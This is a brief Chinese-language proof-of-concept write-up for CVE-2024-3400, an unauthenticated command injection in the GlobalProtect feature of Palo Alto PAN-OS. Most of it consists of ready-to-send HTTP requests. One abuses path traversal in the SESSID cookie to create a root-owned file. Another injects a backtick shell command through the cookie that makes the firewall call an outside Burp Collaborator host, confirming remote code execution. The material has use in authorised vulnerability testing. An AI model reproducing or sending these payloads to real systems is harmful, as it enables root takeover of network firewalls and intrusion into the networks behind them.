CVE-2024-3400 Palo Alto OS 命令注入
供应商描述
Palo Alto Networks PAN-OS 软件的 GlobalProtect 功能中,针对特定 PAN-OS 版本和不同的功能配置存在一个命令注入漏洞,可能允许未经身份验证的攻击者以 root 权限在防火墙上执行任意代码。
感谢 watchtowr labs 🚀
HTTP 请求:
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../var/appweb/sslvpndocs/global-protect/portal/images/poc.txt;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0
poc.txt 应在此路径下创建 /var/appweb/sslvpndocs/global-protect/portal/images/poc.tx 并具有 root 权限。
如果存在漏洞,访问 poc.txt 时将收到 403 而非 404。
GET /global-protect/portal/images/poc.txt HTTP/1.1
Host: 127.0.0.1
Connection: close
必须启用遥测功能。
你可以使用 Burp Collaborator 进行 RCE 检查
POST /ssl-vpn/hipreport.esp HTTP/1.1
Host: 127.0.0.1
Cookie: SESSID=/../../../opt/panlogs/tmp/device_telemetry/minute/hellothere226`hostname${IFS}burpcollaborator.net `;
Connection: close
Content-Type: application/x-www-form-urlencoded
Content-Length: 0